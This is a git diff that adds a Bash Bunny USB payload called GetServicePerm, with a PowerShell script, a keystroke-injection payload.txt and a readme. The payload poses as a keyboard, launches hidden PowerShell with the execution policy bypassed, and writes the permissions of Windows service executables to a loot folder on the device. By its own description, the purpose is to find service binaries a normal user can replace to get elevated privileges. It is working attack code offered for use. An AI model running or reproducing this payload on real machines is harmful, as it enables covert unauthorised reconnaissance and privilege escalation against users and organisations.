diff --git a/payloads/library/recon/GetServicePerm/GetServicePerm.ps1 b/payloads/library/recon/GetServicePerm/GetServicePerm.ps1
new file mode 100644
index 00000000..dd3d0eb6
--- /dev/null
+++ b/payloads/library/recon/GetServicePerm/GetServicePerm.ps1
@@ -0,0 +1,8 @@
+$drive = (gwmi win32_volume -f 'label="BashBunny"' | Select-Object -ExpandProperty DriveLetter)
+
+ForEach ($item in (wmic service list full | Select-String -Pattern "PathName" | Select-String -Pattern "system32")) {
+$file = $item.ToString($item)
+icacls.exe $file.Split("=")[1].split(' ')[0] | Out-File -Append $drive\\loot\\GetServicePerm\\\$env:computername.txt
+}
+
+
diff --git a/payloads/library/recon/GetServicePerm/payload.txt b/payloads/library/recon/GetServicePerm/payload.txt
new file mode 100644
index 00000000..fbc12894
--- /dev/null
+++ b/payloads/library/recon/GetServicePerm/payload.txt
@@ -0,0 +1,33 @@
+#!/bin/bash
+#
+# Title:         GetServicePerm
+# Author:        Resheph @ www.postexplo.com
+# Version:       0.1
+# Target:        Microsoft Windows hosts supporting PowerShell
+# Category:      Recon
+#
+# Description:
+# When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
+# This is useful when a service is executed with elevated privileges but is modifiable by everyone.
+# When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
+# 
+
+# init
+ATTACKMODE HID STORAGE
+
+GET SWITCH_POSITION
+
+LOOTDIR=/root/udisk/loot/GetServicePerm
+mkdir -p $LOOTDIR
+
+# Do Recon
+LED SETUP
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING powerShell -windowstyle hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\GetServicePerm.ps1')"
+Q ENTER
+
+# Done
+sync;sleep 1;sync
+LED FINISH
diff --git a/payloads/library/recon/GetServicePerm/readme.md b/payloads/library/recon/GetServicePerm/readme.md
new file mode 100644
index 00000000..abbcc07a
--- /dev/null
+++ b/payloads/library/recon/GetServicePerm/readme.md
@@ -0,0 +1,25 @@
+# GetServicePerm
+
+* Title:         GetServicePerm
+* Author:        Resheph @ www.postexplo.com
+* Version:       0.1
+* Target:        Microsoft Windows hosts supporting PowerShell
+* Category:      Recon
+
+## Description
+
+When executed on a Windows host the payload gathers a list of permissions on executables used as a service.
+This is useful when a service is executed with elevated privileges but is modifiable by everyone.
+When this senario exists a normal user can modify or replace that executable with anything useful and have it run with elevated privileges.
+
+## Configuration
+
+The only thing you will need to change is the Ducky language so it matches the target.
+
+## STATUS
+
+LED SETUP
+LED FINISH
+
+## Discussion
+